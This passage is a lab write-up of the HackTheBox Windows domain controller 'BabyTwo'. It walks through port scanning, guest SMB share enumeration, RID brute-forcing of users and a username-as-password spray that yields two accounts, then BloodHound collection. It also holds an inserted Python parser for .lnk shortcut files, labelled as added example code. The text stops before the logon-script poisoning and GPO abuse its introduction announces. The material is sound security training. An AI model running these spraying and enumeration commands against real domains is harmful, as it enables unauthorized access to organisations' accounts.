BabyTwo

Another Windows box where I’ll try username as password and find two accounts. From those I’ll get access to the SYSVOL share, where I can poison a logon script to give me a reverse shell when the user logs in. That user has control over another service account that is meant to administer GPOs. I’ll abuse the GPO to get shell in the administrator’s group.

Box Info

Name: BabyTwo
Play on HackTheBox
Release Date: 25 Sep 2025
Retire Date: 25 Sep 2025
OS: Windows
Base Points: Medium [30]
First Blood User: N/A (non-competitive)
First Blood Root: N/A (non-competitive)
Creator: xct
Scenario: The User flag for this Box is located in a non-standard directory, C:.

Recon

Initial Scanning

nmap finds 21 open TCP ports:

oxdf@hacky$ nmap -p- -vvv --min-rate 10000 10.129.194.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-26 10:58 UTC
...[snip]...
Nmap scan report for 10.129.194.134
Host is up, received echo-reply ttl 127 (0.057s latency).
Scanned at 2025-09-26 10:58:37 UTC for 14s
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
3389/tcp  open  ms-wbt-server    syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49664/tcp open  unknown          syn-ack ttl 127
50123/tcp open  unknown          syn-ack ttl 127
50124/tcp open  unknown          syn-ack ttl 127
50142/tcp open  unknown          syn-ack ttl 127
50742/tcp open  unknown          syn-ack ttl 127
54965/tcp open  unknown          syn-ack ttl 127
54970/tcp open  unknown          syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 14.00 seconds
           Raw packets sent: 131059 (5.767MB) | Rcvd: 28 (1.216KB)
oxdf@hacky$ nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389 -sCV 10.129.194.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-26 11:00 UTC
Nmap scan report for 10.129.194.134
Host is up (0.039s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-09-26 11:00:14Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.baby2.vl, DNS:baby2.vl, DNS:BABY2
| Not valid before: 2025-08-19T14:22:11
|_Not valid after:  2105-08-19T14:22:11
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.baby2.vl, DNS:baby2.vl, DNS:BABY2
| Not valid before: 2025-08-19T14:22:11
|_Not valid after:  2105-08-19T14:22:11
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.baby2.vl, DNS:baby2.vl, DNS:BABY2
| Not valid before: 2025-08-19T14:22:11
|_Not valid after:  2105-08-19T14:22:11
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.baby2.vl, DNS:baby2.vl, DNS:BABY2
| Not valid before: 2025-08-19T14:22:11
|_Not valid after:  2105-08-19T14:22:11
|_ssl-date: TLS randomness does not represent time
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc.baby2.vl
| Not valid before: 2025-08-18T14:29:57
|_Not valid after:  2026-02-17T14:29:57
| rdp-ntlm-info:
|   Target_Name: BABY2
|   NetBIOS_Domain_Name: BABY2
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: baby2.vl
|   DNS_Computer_Name: dc.baby2.vl
|   DNS_Tree_Name: baby2.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-09-26T11:00:56+00:00
|_ssl-date: 2025-09-26T11:01:36+00:00; -4s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-09-26T11:01:01
|_  start_date: N/A
|_clock-skew: mean: -4s, deviation: 0s, median: -4s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.55 seconds

The box shows many of the ports associated with a Windows Domain Controller. The domain is baby2.vl, and the hostname is dc.

I’ll use netexec to make a hosts file entry and put it at the top of my /etc/hosts file:

oxdf@hacky$ netexec smb 10.129.194.134 --generate-hosts-file hosts
SMB         10.129.194.134  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
oxdf@hacky$ cat hosts 
10.129.194.134     DC.baby2.vl baby2.vl DC
oxdf@hacky$ cat hosts /etc/hosts | sudo sponge /etc/hosts

All of the ports show a TTL of 127, which matches the expected TTL for Windows one hop away.

nmap notes our clocks are basically in sync. If there were a skew, I would want to sudo ntpdate dc.baby2.vl before any actions that use Kerberos auth.

SMB - TCP 445

Share Enumeration

The netexec run to generate the hosts file also showed that guest auth was enabled. I’ll use that to list shares:

oxdf@hacky$ netexec smb dc.baby2.vl -u guest -p '' --shares
SMB         10.129.194.134  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB         10.129.194.134  445    DC               [+] baby2.vl\guest: 
SMB         10.129.194.134  445    DC               [*] Enumerated shares
SMB         10.129.194.134  445    DC               Share           Permissions     Remark
SMB         10.129.194.134  445    DC               -----           -----------     ------
SMB         10.129.194.134  445    DC               ADMIN$                          Remote Admin
SMB         10.129.194.134  445    DC               apps            READ            
SMB         10.129.194.134  445    DC               C$                              Default share
SMB         10.129.194.134  445    DC               docs                            
SMB         10.129.194.134  445    DC               homes           READ,WRITE      
SMB         10.129.194.134  445    DC               IPC$            READ            Remote IPC
SMB         10.129.194.134  445    DC               NETLOGON        READ            Logon server share 
SMB         10.129.194.134  445    DC               SYSVOL                          Logon server share

BabyTwo has the Windows shares (ADMIN$, C$, and IPC$), the typical domain controller shares (NETLOGON and SYSVOL), as well as three custom shares (apps, docs, and homes).

The homes share has home directories for users:

oxdf@hacky$ smbclient -N //dc.baby2.vl/homes
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Sep 26 11:05:17 2025
  ..                                  D        0  Tue Aug 22 20:10:21 2023
  Amelia.Griffiths                    D        0  Tue Aug 22 20:17:06 2023
  Carl.Moore                          D        0  Tue Aug 22 20:17:06 2023
  Harry.Shaw                          D        0  Tue Aug 22 20:17:06 2023
  Joan.Jennings                       D        0  Tue Aug 22 20:17:06 2023
  Joel.Hurst                          D        0  Tue Aug 22 20:17:06 2023
  Kieran.Mitchell                     D        0  Tue Aug 22 20:17:06 2023
  library                             D        0  Tue Aug 22 20:22:47 2023
  Lynda.Bailey                        D        0  Tue Aug 22 20:17:06 2023
  Mohammed.Harris                     D        0  Tue Aug 22 20:17:06 2023
  Nicola.Lamb                         D        0  Tue Aug 22 20:17:06 2023
  Ryan.Jenkins                        D        0  Tue Aug 22 20:17:06 2023

                6126847 blocks of size 4096. 1930962 blocks available

I’ll look for files on each share with the spider_plus module for netexec:

oxdf@hacky$ netexec smb dc.baby2.vl -u guest -p '' -M spider_plus
SMB         10.129.194.134  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB         10.129.194.134  445    DC               [+] baby2.vl\guest: 
SPIDER_PLUS 10.129.194.134  445    DC               [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.129.194.134  445    DC               [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 10.129.194.134  445    DC               [*]     STATS_FLAG: True
SPIDER_PLUS 10.129.194.134  445    DC               [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.129.194.134  445    DC               [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.129.194.134  445    DC               [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.129.194.134  445    DC               [*]  OUTPUT_FOLDER: /home/oxdf/.nxc/modules/nxc_spider_plus
SMB         10.129.194.134  445    DC               [*] Enumerated shares
SMB         10.129.194.134  445    DC               Share           Permissions     Remark
SMB         10.129.194.134  445    DC               -----           -----------     ------
SMB         10.129.194.134  445    DC               ADMIN$                          Remote Admin
SMB         10.129.194.134  445    DC               apps            READ            
SMB         10.129.194.134  445    DC               C$                              Default share
SMB         10.129.194.134  445    DC               docs                            
SMB         10.129.194.134  445    DC               homes           READ,WRITE      
SMB         10.129.194.134  445    DC               IPC$            READ            Remote IPC
SMB         10.129.194.134  445    DC               NETLOGON        READ            Logon server share 
SMB         10.129.194.134  445    DC               SYSVOL                          Logon server share 
SPIDER_PLUS 10.129.194.134  445    DC               [+] Saved share-file metadata to "/home/oxdf/.nxc/modules/nxc_spider_plus/10.129.194.134.json".
SPIDER_PLUS 10.129.194.134  445    DC               [*] SMB Shares:           8 (ADMIN$, apps, C$, docs, homes, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.129.194.134  445    DC               [*] SMB Readable Shares:  4 (apps, homes, IPC$, NETLOGON)
SPIDER_PLUS 10.129.194.134  445    DC               [*] SMB Writable Shares:  1 (homes)
SPIDER_PLUS 10.129.194.134  445    DC               [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.129.194.134  445    DC               [*] Total folders found:  12
SPIDER_PLUS 10.129.194.134  445    DC               [*] Total files found:    3
SPIDER_PLUS 10.129.194.134  445    DC               [*] File size average:    966.67 B
SPIDER_PLUS 10.129.194.134  445    DC               [*] File size min:        108 B
SPIDER_PLUS 10.129.194.134  445    DC               [*] File size max:        1.76 KB

I’ll move the output file to my local directory, and use jq to get a list of files in each share:

oxdf@hacky$ cat spider_plus.json | jq 'with_entries({key, value: (.value | keys)})'
{
  "NETLOGON": [
    "login.vbs"
  ],
  "apps": [
    "dev/CHANGELOG",
    "dev/login.vbs.lnk"
  ],
  "homes": []
}

I’ll use smbclient to get each of these. CHANGELOG has some notes about a tool:

[0.2]

- Added automated drive mapping

[0.1]

- Rolled out initial version of the domain logon script

I’ll use lnkparse3 (uv tool install lnkparse3) to see details on the lnk file:

oxdf@hacky$ lnkparse login.vbs.lnk
Windows Shortcut Information:
   Guid: 00021401-0000-0000-C000-000000000046
   Link flags: HasTargetIDList | HasLinkInfo | HasRelativePath | HasWorkingDir | IsUnicode | EnableTargetMetadata - (524443)
   File flags: FILE_ATTRIBUTE_ARCHIVE - (32)
   Creation time: 2023-08-22 19:28:18.552829+00:00
   Accessed time: 2023-09-02 14:55:51.994608+00:00
   Modified time: 2023-09-02 14:55:51.994608+00:00
   File size: 992
   Icon index: 0
   Windowstyle: SW_SHOWNORMAL
   Hotkey: UNSET - UNSET {0x0000}

   TARGET:
      Items:
      -  Root Folder:
            Sort index: My Computer
            Guid: 20D04FE0-3AEA-1069-A2D8-08002B30309D
      -  Volume Item:
            Flags: '0xf'
            Data: null
      -  File entry:
            Flags: Is directory
            File size: 0
            File attribute flags: 16
            Primary name: Windows
      -  File entry:
            Flags: Is directory
            File size: 0
            File attribute flags: 16
            Primary name: SYSVOL
      -  File entry:
            Flags: Is directory
            File size: 0
            File attribute flags: 16
            Primary name: sysvol
      -  File entry:
            Flags: Is directory
            File size: 0
            File attribute flags: 1040
            Primary name: baby2.vl
      -  File entry:
            Flags: Is directory
            File size: 0
            File attribute flags: 16
            Primary name: scripts
      -  File entry:
            Flags: Is file
            File size: 992
            File attribute flags: 32
            Primary name: login.vbs

   LINK INFO:
      Link info flags: 3
      Local base path: C:\Windows\SYSVOL\sysvol\baby2.vl\scripts\
      Common path suffix: login.vbs
      Location info:
         Drive type: DRIVE_FIXED
         Drive serial number: '0xe6f32485'
         Volume label: ''
      Location: Local

   DATA:
      Relative path: ..\..\..\Windows\SYSVOL\sysvol\baby2.vl\scripts\login.vbs
      Working directory: C:\Windows\SYSVOL\sysvol\baby2.vl\scripts

   EXTRA:
      SPECIAL FOLDER LOCATION BLOCK:
         Size: 16
         Special folder id: 36
         Offset: 131
      KNOWN FOLDER LOCATION BLOCK:
         Size: 28
         Known folder id: F38BF404-1D43-42F2-9305-67DE0B28FC23
         Offset: 131
      DISTRIBUTED LINK TRACKER BLOCK:
         Size: 96
         Length: 88
         Version: 0
         Machine identifier: dc
         Droid volume identifier: F73129F6-BEED-429A-88BA-9573971C9D61
         Droid file identifier: A6644D7E-411F-11EE-B012-000C29AF9E25
         Birth droid volume identifier: F73129F6-BEED-429A-88BA-9573971C9D61
         Birth droid file identifier: A6644D7E-411F-11EE-B012-000C29AF9E25
      METADATA PROPERTIES BLOCK:
         Size: 677
         Property store:
         -  Storage size: 133
            Version: '0x53505331'
            Format id: DABD30ED-0043-4789-A7F8-D013A4736622
            Serialized property values:
            -  Value size: 105
               Id: 100
               Value: scripts (C:\Windows\SYSVOL\sysvol\baby2.vl)
               Value type: VT_LPWSTR
         -  Storage size: 137
            Version: '0x53505331'
            Format id: 46588AE2-4CBC-4338-BBFC-139326986DCE
            Serialized property values:
            -  Value size: 109
               Id: 4
               Value: S-1-5-21-213243958-1766259620-4276976267-500
               Value type: VT_LPWSTR
         -  Storage size: 189
            Version: '0x53505331'
            Format id: B725F130-47EF-101A-A5F1-02608C9EEBAC
            Serialized property values:
            -  Value size: 37
               Id: 10
               Value: login.vbs
               Value type: VT_LPWSTR
            -  Value size: 21
               Id: 15
               Value: null
               Value type: VT_FILETIME
            -  Value size: 21
               Id: 12
               Value: null
               Value type: VT_UI8
            -  Value size: 61
               Id: 4
               Value: VBScript Script File
               Value type: VT_LPWSTR
            -  Value size: 21
               Id: 14
               Value: null
               Value type: VT_FILETIME
         -  Storage size: 149
            Version: '0x53505331'
            Format id: 28636AA6-953D-11D2-B5D6-00C04FD918D0
            Serialized property values:
            -  Value size: 121
               Id: 30
               Value: C:\Windows\SYSVOL\sysvol\baby2.vl\scripts\login.vbs
               Value type: VT_LPWSTR
         -  Storage size: 57
            Version: '0x53505331'
            Format id: 446D16B1-8DAD-4870-A748-402EA43D788C
            Serialized property values:
            -  Value size: 29
               Id: 104
               Value: null
               Value type: VT_CLSID

It links to login.vbs in C:\Windows\SYSVOL\sysvol\baby2.vl\scripts, the local path behind the SYSVOL share. login.vbs maps the apps and docs shares as the V: and L: drives on a user's machine:

Sub MapNetworkShare(sharePath, driveLetter)
    Dim objNetwork
    Set objNetwork = CreateObject("WScript.Network")    
  
    ' Check if the drive is already mapped
    Dim mappedDrives
    Set mappedDrives = objNetwork.EnumNetworkDrives
    Dim isMapped
    isMapped = False
    For i = 0 To mappedDrives.Count - 1 Step 2
        If UCase(mappedDrives.Item(i)) = UCase(driveLetter & ":") Then
            isMapped = True
            Exit For
        End If
    Next
    
    If isMapped Then
        objNetwork.RemoveNetworkDrive driveLetter & ":", True, True
    End If
    
    objNetwork.MapNetworkDrive driveLetter & ":", sharePath
    
    If Err.Number = 0 Then
        WScript.Echo "Mapped " & driveLetter & ": to " & sharePath
    Else
        WScript.Echo "Failed to map " & driveLetter & ": " & Err.Description
    End If
    
    Set objNetwork = Nothing
End Sub

MapNetworkShare "\\dc.baby2.vl\apps", "V"
MapNetworkShare "\\dc.baby2.vl\docs", "L"
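To see where the fields lnkparse reported above actually come from, here is an added parser in Python (example code written for this write-up, not from the original post or from lnkparse3). It pulls the target out of a shortcut's LinkInfo block (local base path, common path suffix, drive type, serial number) and its RelativePath/WorkingDir string data, and skips the LinkTargetIDList rather than decoding it. The sample shortcut it builds is constructed here to mirror the login.vbs link (paths, drive type and serial from the lnkparse output; timestamps zeroed) so the script runs offline; pass a real .lnk path as the first argument to parse one from disk.

```python
"""Minimal MS-SHLLINK (.lnk) parser: recover a shortcut's target path.

Added example, not code from the original post or from lnkparse3. SAMPLE_LNK
is constructed below to mirror the login.vbs shortcut from the apps share.
"""
import struct
import sys

HEADER_SIZE = 0x4C
# {00021401-0000-0000-C000-000000000046} in on-disk (mixed-endian) byte order
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
# LinkInfoFlags (MS-SHLLINK 2.3)
VOLUME_ID_AND_LOCAL_BASE_PATH = 0x01
DRIVE_FIXED = 3


def _cstr(buf, off):
    """NUL-terminated ANSI string starting at buf[off]."""
    return buf[off:buf.index(b"\x00", off)].decode("cp1252")


def parse_lnk(data):
    """Return a dict of target-related fields from raw .lnk bytes."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    out = {"flags": flags}
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip the IDList: size word + IDList bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        li_size, _hdr, li_flags, vol_off, lbp_off, _cnrl_off, cps_off = struct.unpack_from("<7I", data, pos)
        li = data[pos:pos + li_size]              # offsets below are relative to LinkInfo start
        if li_flags & VOLUME_ID_AND_LOCAL_BASE_PATH:
            out["drive_type"], out["drive_serial"] = struct.unpack_from("<II", li, vol_off + 4)
            out["local_base_path"] = _cstr(li, lbp_off)
        out["common_path_suffix"] = _cstr(li, cps_off)
        pos += li_size
    # StringData: one counted string per set flag, always in this fixed order
    for flag, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                       (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos:pos + count * width]
            out[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
            pos += count * width
    if "local_base_path" in out:
        out["target"] = out["local_base_path"] + out["common_path_suffix"]
    return out


def build_lnk(local_base_path, suffix, relative_path, working_dir, drive_serial):
    """Constructed sample: header + one-item IDList + LinkInfo + Unicode strings."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_LINK_INFO | HAS_RELATIVE_PATH | HAS_WORKING_DIR | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 992, 0, 1, 0, 0, 0, 0)   # attrs=ARCHIVE, size=992, SW_SHOWNORMAL
    item = b"\x1f\x50" + bytes.fromhex("e04fd020ea3a6910a2d808002b30309d")  # "My Computer" root item
    idlist = struct.pack("<H", 2 + len(item)) + item + b"\x00\x00"           # ItemID + TerminalID
    target_id_list = struct.pack("<H", len(idlist)) + idlist
    label = b"\x00"                                                            # empty volume label
    volume_id = struct.pack("<IIII", 16 + len(label), DRIVE_FIXED, drive_serial, 16) + label
    lbp = local_base_path.encode("cp1252") + b"\x00"
    cps = suffix.encode("cp1252") + b"\x00"
    vol_off = 0x1C                                   # LinkInfoHeaderSize without Unicode offsets
    lbp_off = vol_off + len(volume_id)
    cps_off = lbp_off + len(lbp)
    link_info = struct.pack("<7I", cps_off + len(cps), 0x1C, VOLUME_ID_AND_LOCAL_BASE_PATH,
                            vol_off, lbp_off, 0, cps_off) + volume_id + lbp + cps

    def ustr(s):                                     # CountCharacters + UTF-16LE, no terminator
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + target_id_list + link_info + ustr(relative_path) + ustr(working_dir)


SAMPLE_LNK = build_lnk(
    "C:\\Windows\\SYSVOL\\sysvol\\baby2.vl\\scripts\\", "login.vbs",
    "..\\..\\..\\Windows\\SYSVOL\\sysvol\\baby2.vl\\scripts\\login.vbs",
    "C:\\Windows\\SYSVOL\\sysvol\\baby2.vl\\scripts", 0xE6F32485)

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_LNK
    for key, value in parse_lnk(blob).items():
        print(f"{key:20} {value!r}")
```

A shortcut carries the target in more than one place (the IDList, the LinkInfo path, and the RelativePath/WorkingDir strings), and nothing forces them to agree, so when triaging a suspicious .lnk it is worth comparing what each one says rather than trusting the first path a viewer shows.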

Users

The guest account can't list users directly (--users returns nothing), but it can enumerate them by brute forcing RIDs:

oxdf@hacky$ netexec smb dc.baby2.vl -u guest -p '' --users
SMB         10.129.194.134  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB         10.129.194.134  445    DC               [+] baby2.vl\guest:
oxdf@hacky$ netexec smb dc.baby2.vl -u guest -p '' --rid-brute
SMB         10.129.194.134  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB         10.129.194.134  445    DC               [+] baby2.vl\guest:
SMB         10.129.194.134  445    DC               498: BABY2\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.194.134  445    DC               500: BABY2\Administrator (SidTypeUser)
SMB         10.129.194.134  445    DC               501: BABY2\Guest (SidTypeUser)
SMB         10.129.194.134  445    DC               502: BABY2\krbtgt (SidTypeUser)
SMB         10.129.194.134  445    DC               512: BABY2\Domain Admins (SidTypeGroup)
SMB         10.129.194.134  445    DC               513: BABY2\Domain Users (SidTypeGroup)
SMB         10.129.194.134  445    DC               514: BABY2\Domain Guests (SidTypeGroup)
SMB         10.129.194.134  445    DC               515: BABY2\Domain Computers (SidTypeGroup)
SMB         10.129.194.134  445    DC               516: BABY2\Domain Controllers (SidTypeGroup)
SMB         10.129.194.134  445    DC               517: BABY2\Cert Publishers (SidTypeAlias)
SMB         10.129.194.134  445    DC               518: BABY2\Schema Admins (SidTypeGroup)
SMB         10.129.194.134  445    DC               519: BABY2\Enterprise Admins (SidTypeGroup)
SMB         10.129.194.134  445    DC               520: BABY2\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.194.134  445    DC               521: BABY2\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.194.134  445    DC               522: BABY2\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.194.134  445    DC               525: BABY2\Protected Users (SidTypeGroup)
SMB         10.129.194.134  445    DC               526: BABY2\Key Admins (SidTypeGroup)
SMB         10.129.194.134  445    DC               527: BABY2\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.194.134  445    DC               553: BABY2\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.194.134  445    DC               571: BABY2\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.194.134  445    DC               572: BABY2\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.194.134  445    DC               1000: BABY2\DC$ (SidTypeUser)
SMB         10.129.194.134  445    DC               1101: BABY2\DnsAdmins (SidTypeAlias)
SMB         10.129.194.134  445    DC               1102: BABY2\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.194.134  445    DC               1103: BABY2\gpoadm (SidTypeUser)
SMB         10.129.194.134  445    DC               1104: BABY2\office (SidTypeGroup)
SMB         10.129.194.134  445    DC               1105: BABY2\Joan.Jennings (SidTypeUser)
SMB         10.129.194.134  445    DC               1106: BABY2\Mohammed.Harris (SidTypeUser)
SMB         10.129.194.134  445    DC               1107: BABY2\Harry.Shaw (SidTypeUser)
SMB         10.129.194.134  445    DC               1108: BABY2\Carl.Moore (SidTypeUser)
SMB         10.129.194.134  445    DC               1109: BABY2\Ryan.Jenkins (SidTypeUser)
SMB         10.129.194.134  445    DC               1110: BABY2\Kieran.Mitchell (SidTypeUser)
SMB         10.129.194.134  445    DC               1111: BABY2\Nicola.Lamb (SidTypeUser)
SMB         10.129.194.134  445    DC               1112: BABY2\Lynda.Bailey (SidTypeUser)
SMB         10.129.194.134  445    DC               1113: BABY2\Joel.Hurst (SidTypeUser)
SMB         10.129.194.134  445    DC               1114: BABY2\Amelia.Griffiths (SidTypeUser)
SMB         10.129.194.134  445    DC               1602: BABY2\library (SidTypeUser)
SMB         10.129.194.134  445    DC               2601: BABY2\legacy (SidTypeGroup)

This includes all the users with home directories, and more. I’ll use this to make a users list:

oxdf@hacky$ netexec smb dc.baby2.vl -u guest -p '' --rid-brute | grep SidTypeUser | cut -d'\' -f2 | cut -d' ' -f1 | tee users
Administrator
Guest
krbtgt
DC$
gpoadm
Joan.Jennings
Mohammed.Harris
Harry.Shaw
Carl.Moore
Ryan.Jenkins
Kieran.Mitchell
Nicola.Lamb
Lynda.Bailey
Joel.Hurst
Amelia.Griffiths
library

Shell as Amelia.Griffiths

Auth as library / Carl.Moore

Vulnlabs really likes to showcase password attacks on Windows boxes. One of these is checking for users whose password is their username. With --no-bruteforce, netexec pairs each user with the entry at the same position in the password list, so each account is tried exactly once:

oxdf@hacky$ netexec smb dc.baby2.vl -u users -p users --no-bruteforce --continue-on-success 
SMB         10.129.194.134  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB         10.129.194.134  445    DC               [-] baby2.vl\Administrator:Administrator STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [-] baby2.vl\Guest:Guest STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [-] baby2.vl\krbtgt:krbtgt STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [-] baby2.vl\DC$:DC$ STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [-] baby2.vl\gpoadm:gpoadm STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [-] baby2.vl\Joan.Jennings:Joan.Jennings STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [-] baby2.vl\Mohammed.Harris:Mohammed.Harris STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [-] baby2.vl\Harry.Shaw:Harry.Shaw STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [+] baby2.vl\Carl.Moore:Carl.Moore 
SMB         10.129.194.134  445    DC               [-] baby2.vl\Ryan.Jenkins:Ryan.Jenkins STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [-] baby2.vl\Kieran.Mitchell:Kieran.Mitchell STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [-] baby2.vl\Nicola.Lamb:Nicola.Lamb STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [-] baby2.vl\Lynda.Bailey:Lynda.Bailey STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [-] baby2.vl\Joel.Hurst:Joel.Hurst STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [-] baby2.vl\Amelia.Griffiths:Amelia.Griffiths STATUS_LOGON_FAILURE
SMB         10.129.194.134  445    DC               [+] baby2.vl\library:library 

Two users match!

BloodHound

I’ll use the library account to collect BloodHound data with netexec:

oxdf@hacky$ netexec ldap dc.baby2.vl -u library -p library --bloodhound -c All --dns-server 10.129.194.134
LDAP        10.129.194.134  389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:baby2.vl) (signing:None) (channel binding:Never) 
LDAP        10.129.194.134  389    DC               [+] baby2.vl\library:library 
LDAP        10.129.194.134  389    DC               Resolved collection methods: session, dcom, psremote, localadmin, trusts, group, objectprops, container, rdp, acl
LDAP        10.129.194.134  389    DC               Done in 0M 4S
LDAP        10.129.194.134  389    DC               Compressing output into /home/oxdf/.nxc/logs/DC_10.129.194.134_2025-09-26_135355_bloodhound.zip

I’ll start the BloodHound-CE Docker and feed the data in, marking both users as owned. Neither shows anything interesting as far as outbound control.

Looking through the users, I’ll note that Amelia.Griffiths has an interesting Loginscript:

[Image: BloodHound node properties for Amelia.Griffiths, with login.vbs set as the logon script]

SMB

Share Enumeration

While the guest account didn’t have access to SYSVOL, the library and Carl.Moore accounts do:

oxdf@hacky$ netexec smb dc.baby2.vl -u library -p library --shares
